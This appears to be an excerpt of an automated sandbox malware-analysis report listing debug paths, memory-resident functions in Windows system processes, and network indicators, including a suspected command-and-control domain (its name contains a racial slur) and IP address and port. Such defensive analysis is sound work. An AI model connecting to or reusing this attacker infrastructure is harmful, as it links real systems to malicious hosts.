Source: Binary string: (@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 00000019.00000002.2278957605.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000000.2095093033.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 00000019.00000002.2281104121.000001ADEC04C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000000.2095161886.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000019.00000002.2281104121.000001ADEC04C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000000.2095161886.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 00000019.00000002.2278957605.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000019.00000002.2278957605.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2.pdbr source: svchost.exe, 00000019.00000002.2281104121.000001ADEC04C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000000.2095161886.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 00000019.00000000.2095214528.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000002.2283406583.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: WINLOA~1.PDB source: svchost.exe, 00000019.00000002.2281104121.000001ADEC04C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000000.2095161886.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000019.00000000.2095214528.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000002.2283406583.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000019.00000002.2278957605.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000000.2095093033.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\wct3D66.tmp.pdb source: svchost.exe, 00000019.00000000.2095214528.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000002.2283406583.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000019.00000002.2281104121.000001ADEC04C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000000.2095161886.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000019.00000002.2278957605.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000000.2095093033.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb* source: svchost.exe, 00000019.00000000.2095214528.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000002.2283406583.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 00000019.00000000.2095214528.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000002.2283406583.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\wmsetup.log.pdb source: svchost.exe, 00000019.00000002.2281104121.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000000.2095161886.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000019.00000002.2278957605.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000000.2095093033.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000019.00000000.2095214528.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000002.2283406583.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: C:\Windows\System32\winlogon.exeCode function: 9_2_00000225DC64DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,9_2_00000225DC64DA18
Source: C:\Windows\System32\winlogon.exeCode function: 9_2_00000225DC64D894 FindFirstFileExW,9_2_00000225DC64D894
Source: C:\Windows\System32\winlogon.exeCode function: 9_2_00000225DC67DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,9_2_00000225DC67DA18
Source: C:\Windows\System32\winlogon.exeCode function: 9_2_00000225DC67D894 FindFirstFileExW,9_2_00000225DC67D894
Source: C:\Windows\System32\winlogon.exeCode function: 9_2_00000225DC6ADA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,9_2_00000225DC6ADA18
Source: C:\Windows\System32\winlogon.exeCode function: 9_2_00000225DC6AD894 FindFirstFileExW,9_2_00000225DC6AD894
Source: C:\Windows\System32\lsass.exeCode function: 10_2_00000202C0AEDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,10_2_00000202C0AEDA18
Source: C:\Windows\System32\lsass.exeCode function: 10_2_00000202C0AED894 FindFirstFileExW,10_2_00000202C0AED894
Source: C:\Windows\System32\svchost.exeCode function: 11_2_000002A66130DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,11_2_000002A66130DA18
Source: C:\Windows\System32\svchost.exeCode function: 11_2_000002A66130D894 FindFirstFileExW,11_2_000002A66130D894
Source: C:\Windows\System32\dwm.exeCode function: 14_2_000002BAAED9DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,14_2_000002BAAED9DA18
Source: C:\Windows\System32\dwm.exeCode function: 14_2_000002BAAED9D894 FindFirstFileExW,14_2_000002BAAED9D894
Source: C:\Windows\System32\dwm.exeCode function: 14_2_000002BAAEE0DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,14_2_000002BAAEE0DA18
Source: C:\Windows\System32\dwm.exeCode function: 14_2_000002BAAEE0D894 FindFirstFileExW,14_2_000002BAAEE0D894
Source: C:\Windows\System32\dwm.exeCode function: 14_2_000002BAAEE6DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,14_2_000002BAAEE6DA18
Source: C:\Windows\System32\dwm.exeCode function: 14_2_000002BAAEE6D894 FindFirstFileExW,14_2_000002BAAEE6D894
Source: C:\Windows\System32\cmd.exeCode function: 15_2_000002512A6ED894 FindFirstFileExW,15_2_000002512A6ED894
Source: C:\Windows\System32\cmd.exeCode function: 15_2_000002512A6EDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,15_2_000002512A6EDA18
Source: C:\Windows\System32\conhost.exeCode function: 16_2_000001BEB0A3DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,16_2_000001BEB0A3DA18
Source: C:\Windows\System32\conhost.exeCode function: 16_2_000001BEB0A3D894 FindFirstFileExW,16_2_000001BEB0A3D894
Source: C:\Windows\System32\svchost.exeCode function: 20_2_0000026A879CD894 FindFirstFileExW,20_2_0000026A879CD894
Source: C:\Windows\System32\svchost.exeCode function: 20_2_0000026A879CDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,20_2_0000026A879CDA18
Source: C:\Windows\System32\svchost.exeCode function: 21_2_00000179537ADA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,21_2_00000179537ADA18
Source: C:\Windows\System32\svchost.exeCode function: 21_2_00000179537AD894 FindFirstFileExW,21_2_00000179537AD894
Source: C:\Windows\System32\svchost.exeCode function: 21_2_00000179537DDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,21_2_00000179537DDA18
Source: C:\Windows\System32\svchost.exeCode function: 21_2_00000179537DD894 FindFirstFileExW,21_2_00000179537DD894
Source: C:\Windows\System32\svchost.exeCode function: 22_2_000002295D56DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,22_2_000002295D56DA18
Source: C:\Windows\System32\svchost.exeCode function: 22_2_000002295D56D894 FindFirstFileExW,22_2_000002295D56D894
Source: C:\Windows\System32\svchost.exeCode function: 23_2_0000025306E6DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,23_2_0000025306E6DA18
Source: C:\Windows\System32\svchost.exeCode function: 23_2_0000025306E6D894 FindFirstFileExW,23_2_0000025306E6D894
Source: C:\Windows\System32\svchost.exeCode function: 23_2_0000025306ECDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,23_2_0000025306ECDA18
Source: C:\Windows\System32\svchost.exeCode function: 23_2_0000025306ECD894 FindFirstFileExW,23_2_0000025306ECD894
Source: C:\Windows\System32\svchost.exeCode function: 24_2_000001845B3CD894 FindFirstFileExW,24_2_000001845B3CD894
Source: C:\Windows\System32\svchost.exeCode function: 24_2_000001845B3CDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,24_2_000001845B3CDA18
Source: C:\Windows\System32\svchost.exeCode function: 25_2_000001ADECD4D894 FindFirstFileExW,25_2_000001ADECD4D894
Source: C:\Windows\System32\svchost.exeCode function: 25_2_000001ADECD4DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,25_2_000001ADECD4DA18
Source: C:\Windows\System32\svchost.exeCode function: 26_2_000001D55907D894 FindFirstFileExW,26_2_000001D55907D894
Source: C:\Windows\System32\svchost.exeCode function: 26_2_000001D55907DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,26_2_000001D55907DA18
Source: C:\Windows\System32\svchost.exeCode function: 26_2_000001D5590AD894 FindFirstFileExW,26_2_000001D5590AD894
Source: C:\Windows\System32\svchost.exeCode function: 26_2_000001D5590ADA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,26_2_000001D5590ADA18
Source: C:\Windows\System32\svchost.exeCode function: 26_2_000001D5590DD894 FindFirstFileExW,26_2_000001D5590DD894
Source: C:\Windows\System32\svchost.exeCode function: 26_2_000001D5590DDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,26_2_000001D5590DDA18
Source: C:\Windows\System32\svchost.exeCode function: 29_2_00000241A9EADA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,29_2_00000241A9EADA18
Source: C:\Windows\System32\svchost.exeCode function: 29_2_00000241A9EAD894 FindFirstFileExW,29_2_00000241A9EAD894
Source: C:\Windows\System32\svchost.exeCode function: 30_2_000001CD7319DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,30_2_000001CD7319DA18
Source: C:\Windows\System32\svchost.exeCode function: 30_2_000001CD7319D894 FindFirstFileExW,30_2_000001CD7319D894

Networking

barindex
Source: C:\Windows\System32\svchost.exeDomain query: iam.nigga.dad
Source: global trafficTCP traffic: 192.168.2.4:49736 -> 103.230.121.81:4782
Source: Joe Sandbox ViewASN Name: VPSQUANUS VPSQUANUS
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficDNS traffic detected: DNS query: iam.nigga.dad
Source: lsass.exe, 0000000A.00000000.1990705079.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2326201564.00000202C0390000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: lsass.exe, 0000000A.00000000.1990410798.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2300143860.00000202BFC89000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: lsass.exe, 0000000A.00000000.1990410798.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1990705079.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2326201564.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2300143860.00000202BFC89000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: lsass.exe, 0000000A.00000000.1990365949.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1990410798.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1990705079.00000202C0390000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
Source: lsass.exe, 0000000A.00000000.1990705079.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2318339172.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2326201564.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1990610706.00000202C0351000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.crt0
Source: lsass.exe, 0000000A.00000000.1990705079.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2326201564.00000202C0390000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: lsass.exe, 0000000A.00000000.1990410798.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2300143860.00000202BFC89000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: lsass.exe, 0000000A.00000000.1990365949.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1990410798.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1990705079.00000202C0390000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
Source: lsass.exe, 0000000A.00000000.1990410798.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1990705079.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2326201564.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2300143860.00000202BFC89000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: lsass.exe, 0000000A.00000000.1990705079.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2318339172.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2326201564.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1990610706.00000202C0351000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigicertSHA2SecureServerCA-1.crl0?
Source: lsass.exe, 0000000A.00000000.1990494096.00000202C0249000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000003.2197209944.00000202C024B000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1990705079.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2309743013.00000202C024B000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1990890409.00000202C043D000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2326201564.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2335171262.00000202C043D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: lsass.exe, 0000000A.00000000.1990705079.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2326201564.00000202C0390000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: lsass.exe, 0000000A.00000000.1990410798.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1990705079.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2326201564.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2300143860.00000202BFC89000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: lsass.exe, 0000000A.00000000.1990705079.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2318339172.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2326201564.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1990610706.00000202C0351000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0
Source: svchost.exe, 00000032.00000000.2225892296.0000026EF4C2A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000032.00000000.2226060832.0000026EF4C74000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/
Source: lsass.exe, 0000000A.00000000.1990410798.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2300143860.00000202BFC89000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: lsass.exe, 0000000A.00000002.2308320698.00000202C0200000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1990494096.00000202C0200000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: lsass.exe, 0000000A.00000002.2294720513.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1990349580.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702
Source: lsass.exe, 0000000A.00000000.1990365949.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2296144477.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512
Source: lsass.exe, 0000000A.00000002.2294720513.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1990349580.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
Source: lsass.exe, 0000000A.00000000.1990365949.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1990410798.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1990705079.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2326201564.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2300143860.00000202BFC89000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
Source: lsass.exe, 0000000A.00000000.1990494096.00000202C0249000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000003.2197209944.00000202C024B000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1990705079.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2309743013.00000202C024B000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1990890409.00000202C043D000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2326201564.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2335171262.00000202C043D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0:
Source: lsass.exe, 0000000A.00000000.1990705079.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2318339172.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2326201564.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1990610706.00000202C0351000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0H
Source: lsass.exe, 0000000A.00000000.1990494096.00000202C0249000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000003.2197209944.00000202C024B000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1990705079.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2309743013.00000202C024B000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2318339172.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2326201564.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1990610706.00000202C0351000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.msocsp.com0
Source: powershell.exe, 0000001C.00000002.2348049601.00000253A6312000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: svchost.exe, 0000001D.00000002.2312973165.00000241A96E0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
Source: lsass.exe, 0000000A.00000002.2294720513.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1990349580.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy
Source: lsass.exe, 0000000A.00000002.2294720513.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1990349580.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
Source: powershell.exe, 0000001C.00000002.2348049601.00000253A6041000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: lsass.exe, 0000000A.00000000.1990365949.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2296144477.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2294720513.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1990349580.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/07/securitypolicy
Source: lsass.exe, 0000000A.00000002.2294720513.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1990349580.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: lsass.exe, 0000000A.00000002.2294720513.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1990349580.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/erties
Source: lsass.exe, 0000000A.00000002.2294720513.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1990349580.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap12/
Source: powershell.exe, 0000001C.00000002.2348049601.00000253A6312000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: lsass.exe, 0000000A.00000000.1990705079.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2318339172.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2326201564.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1990610706.00000202C0351000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0~
Source: svchost.exe, 00000026.00000000.2153697847.000001AABFC8F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000026.00000002.2288176120.000001AABFC8F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.msftconnecttest.com
Source: svchost.exe, 00000026.00000000.2153697847.000001AABFC8F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000026.00000002.2288176120.000001AABFC8F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.msftconnecttest.com/
Source: powershell.exe, 0000001C.00000002.2348049601.00000253A6041000.00000004.00000001.00020000.00000000.sdmp, Null.5.dr, Null.28.drString found in binary or memory: https://aka.ms/pscore6
Source: powershell.exe, 0000001C.00000002.2348049601.00000253A6041000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 0000001C.00000002.2348049601.00000253A6041000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6xG_
Source: svchost.exe, 00000031.00000002.2367360741.0000020D260D8000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000002.2377995052.0000020D26484000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000002.2309382553.0000020D25613000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2214085696.0000020D26029000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2210065535.0000020D25613000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.comSRD1%
Source: powershell.exe, 0000001C.00000002.2348049601.00000253A6312000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: svchost.exe, 00000032.00000002.2288807252.0000026EF4C74000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://otelrules.azureedge.net/
Source: svchost.exe, 00000032.00000002.2291959517.0000026EF4C7B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://otelrules.azureedge.net/lse
Source: svchost.exe, 00000031.00000002.2377995052.0000020D26484000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000002.2383762701.0000020D26586000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.comSRD1-
Source: svchost.exe, 00000031.00000000.2210065535.0000020D25613000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.com
Source: svchost.exe, 00000031.00000002.2309382553.0000020D25613000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2210065535.0000020D25613000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.com%
Source: svchost.exe, 00000031.00000002.2377995052.0000020D26484000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000002.2383762701.0000020D26586000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000002.2384491857.0000020D265BD000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2221218953.0000020D265BD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comSRD13
Source: Microsoft-Windows-PushNotification-Platform%4Operational.evtx.26.drString found in binary or memory: https://wns2-by3p.notify.windows.com/?token=AwYAAACklixT6U5TxXWj7Y4oTt3JqNuZjYaQtFRvg3Ifna8Pnwup50yq
Source: svchost.exe, 00000031.00000000.2219839835.0000020D264CE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.com
